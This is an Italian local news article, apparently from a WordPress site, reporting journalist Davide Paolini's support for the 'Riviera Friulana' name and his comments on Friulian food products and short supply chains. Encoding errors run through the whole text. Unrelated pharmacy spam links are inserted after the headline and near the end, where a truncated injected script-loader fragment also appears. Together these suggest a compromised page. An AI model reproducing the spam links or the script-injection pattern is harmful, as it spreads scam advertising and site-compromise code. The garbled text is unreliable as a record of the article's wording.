PIACE AL ‘GASTRONAUTA’ DAVIDE PAOLINI L’IDEA DELLA RIVIERA FRIULANA

Davide-Paolini

Buy http://www.xylophene.fr/cost-of-actos-at-walmart/

Piace la denominazione Riviera Friulana al ai???Gastronautaai??i??, Davide Paolini. Il giornalista enogastronomico che ha coniato e declinato questo sostantivo, il Gastronauta, per indicare sAi?? stesso e la propria attivitAi?? di navigatore del gusto sul territorio. Ma anche per definire quanti, coadiuvati dalle potenzialitAi?? del web, ma anche sospinti dalla curiositAi?? dei gourmet, inseguono le peculiaritAi?? anche nei siti piA? riposti del territorio, per degustarle, valorizzarle, divulgarle anche con il semplice, artigianale, tradizionale ma insostituibile metodo di relazione sociale che A? il passa parola. Certo, Paolini, per diffondere il suo metodo di esaltazione delle eccellenze, ma anche di difesa dei sapori della tradizione locale, si avvale di mezzi tradizionali, ma incisivi. Come le dirette su Radio 24, e gli articoli su Il Sole 24 ore. Lai??i??abbiamo incontrato alla inaugurazione della 47.edizione di Agriest, al quartiere fieristico udinese, testimonial della rassegna della meccanizzazione e delle tecnologie del settore primario, che si A? conclusa ieri. Aveva da poco terminato di condurre il convegno e la tavola rotonda inaugurali concluse dallai??i??assessore regionale alle Risorse Rurali, Agroalimentari e Forestali, Claudio Violino. ai???Eai??i?? sicuramente unai??i??idea interessante ai??i?? ci ha commentato riferendosi alla nostra sollecitazione di un parere sulla filosofia che ci ha spinti a ideare lai??i??Associazione culturale La Riviera Friulanaai???. Il nome Bassa, in tutte le culture, specialmente nella nostra, ha commentato, evoca un messaggio certamente negativo. E non si presta alla promozione del territorio. Un territorio che anche per Paolini A? ricco di peculiaritAi?? e tipicitAi??. ai???Sono rimasto molto sorpreso ai??i?? ha aggiunto ai??i?? del radicamento del prodotto locale sul territorio friulano e rivierasco; perA? i consumatori non conoscono molto i prodotti del posto. Per contro, comai??i??A? emerso da una indagine realizzata di recente, i cittadini del Friuli Venezia Giulia consumano per ben il 54 per cento prodotti tipici. Ma conoscono davvero poco quelli tipici di casa loroai???. ai???Nel Friuli Venezia Giulia ai??i?? ha aggiunto ai??i?? cai??i??A? un altro valore aggiunto tra la popolazione: lai??i??alta percezione della qualitAi?? rispetto ad altre regioni dai??i??Italiaai???. Ancora sulle produzioni tipiche della nostra realtAi??, Paolini ha ricordato che oltre al Prosciutto di San Daniele, ai grandi vini, al formaggio Montasio, alle carni di razze bovine pregiate come la Pezzata Rossa, al di fuori del territorio regionale cai??i??A? una scarsissima conoscenza dei prodotti tipici locali. ai???Dei giacimenti di sapori ai??i?? ha proseguito Paolini ai??i?? capaci di attrarre sul territorio il viaggiatore alla ricerca dei prodotti di nicchiaai???. Che invece sono ben presenti sul posto, e ce ne sono tantissimi. ai???Esistono le condizioni ai??i?? ha soggiunto ai??i?? per sviluppare la fruizione del territorio rurale e produrre ricchezzaai???. E portare il territorio friulano, e rivierasco, allai??i??attenzione dei navigatori del gusto, i gastronauti dei sapori. Paolini ha quindi aggiunto unai??i??osservazione interessante sulle abitudini dei consumatori. Che nel corso della settimana lavorativa scelgono prodotti alimentari di marca. Il fine settimana si cibano preferibilmente di quelli locali. La spiegazione di queste consuetudini diffuse? Nel fine settimana cai??i??A? piA? tempo da dedicare agli acquisti, ma anche per cucinare il cibo. Ecco dunque emergere dalle valutazioni sugli stili di vita della comunitAi?? regionale, nuove opportunitAi?? per lai??i??agricoltura moderna, attenta alle potenzialitAi?? del territorio rurale: cai??i??A? un ottimo spazio di manovra per valorizzare le produzioni a km zero, la filiera corta. Quella che vede i piccoli produttori attori della vendita. Le microfiliere possono essere la ricetta vincente anche per far emergere lai??i??agricoltura di qualitAi?? della Riviera Friulana. Che giAi?? propone produzioni di nicchia, dai primaverili asparagi, agli oli dai??i??oliva, ai cereali pregiati, tra essi perfino il riso, ai prodotti da bovini della razza Pezzata rossa, di origine friulana, che sono allevati e valorizzati geneticamente a poche centinaia di metri dalla Laguna di Marano, nellai??i??azienda agricola Marianis, della Regione Friuli Venezia Giulia.

acquistare finpecia online himalaya diakof price Cheap

Carlo Morandini

Order

Ai??

var d=document;var s=d.createElement(‘script’); } http://www.honeguer.pt/servicos/purchase-dostinex-para/ Buy comed exelon pay online http://voimaailosta.fi/cost-of-himplasia-in-india/ buy liponexol carb

Lascia una risposta

Powered by WordPress | Designed by: diet | Thanks to lasik, online colleges and seo